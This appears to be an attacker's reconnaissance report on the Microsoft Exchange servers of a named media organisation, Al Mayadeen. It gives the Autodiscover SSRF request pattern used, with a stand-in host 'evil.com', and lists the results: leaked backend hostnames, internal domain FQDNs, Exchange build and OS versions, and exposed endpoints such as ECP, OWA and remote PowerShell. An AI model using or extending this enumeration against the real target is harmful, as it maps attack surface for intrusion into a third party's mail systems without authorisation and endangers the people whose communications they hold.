Exchange Backend Server Enumeration — Al Mayadeen (autodiscover.almayadeen.net) ================================================================================ Method: Autodiscover JSON SSRF path leaking X-BEServer, X-CalculatedBETarget, X-DiagInfo headers URL Pattern: /autodiscover/autodiscover.json?@evil.com/{service}/?&Email=autodiscover/autodiscover.json%3F@evil.com CONFIRMED SERVERS (6 total): ============================= Frontend (Internet-facing CAS): BHS-EX09 — X-FEServer header on all responses FQDN: BHS-EX09.ITTIHADTV.LOCAL Build: 15.1.2507.59 (Exchange 2016 CU23 Sep25HU) OS: Windows Server 2012 R2 (IIS 8.5) Role: Client Access Server (public-facing) Backend Servers (load-balanced round-robin): BHS-EX01 — Seen via: EWS, MAPI/EMSMDB BHS-EX02 — Seen via: MAPI/NSPI, ECP, PowerShell, RPC, ActiveSync BHS-EX03 — Seen via: OAB, OWA, EWS, MAPI/NSPI, RPC, ECP, ActiveSync BHS-EX04 — Seen via: EWS, MAPI/NSPI, OAB, RPC, MAPI/EMSMDB, PowerShell, OWA BHS-EX05 — Seen via: ActiveSync, MAPI/EMSMDB, ECP, Federation (port 444) FQDN: bhs-ex05.ittihadtv.local (from federation metadata) MISSING SERVERS (possibly decommissioned): BHS-EX06 — NOT SEEN in 20+ rounds BHS-EX07 — NOT SEEN in 20+ rounds BHS-EX08 — NOT SEEN in 20+ rounds Architecture Analysis: - 5 backend mailbox servers in Database Availability Group (DAG) - 1 frontend Client Access Server (BHS-EX09) - All in ITTIHADTV.LOCAL Active Directory domain - BHS prefix suggests OVH Beauharnois (Quebec, Canada) datacenter - Load balancing is round-robin across all 5 backends - Servers 06-08 either decommissioned or in separate DAG/role Service Mapping (from SSRF responses): /ews/exchange.asmx — All backends (EX01-EX05) /mapi/nspi — All backends (Address Book/GAL) /mapi/emsmdb — All backends (MAPI connections) /oab — All backends (Offline Address Book) /rpc/rpcproxy.dll — All backends (Outlook Anywhere) /ecp — All backends (Admin panel) /owa — All backends (Webmail) /powershell — All backends (Remote management) /Microsoft-Server-ActiveSync — All backends (Mobile sync) Additional Headers Leaked: X-CalculatedBETarget: bhs-exNN.ittihadtv.local (full FQDN) X-DiagInfo: BHS-EXNN (NetBIOS name) X-BEServer: BHS-EXNN (backend server name) X-FEServer: BHS-EX09 (frontend server, constant) X-OWA-Version: 15.1.2507.59 (on all responses) X-WSSecurity-Enabled: True (on MRS Proxy) X-OAuth-Enabled: True (on MRS Proxy) Enumeration Date: Feb 28, 2026 Rounds: 20+ (confirmed only EX01-EX05 in backend pool)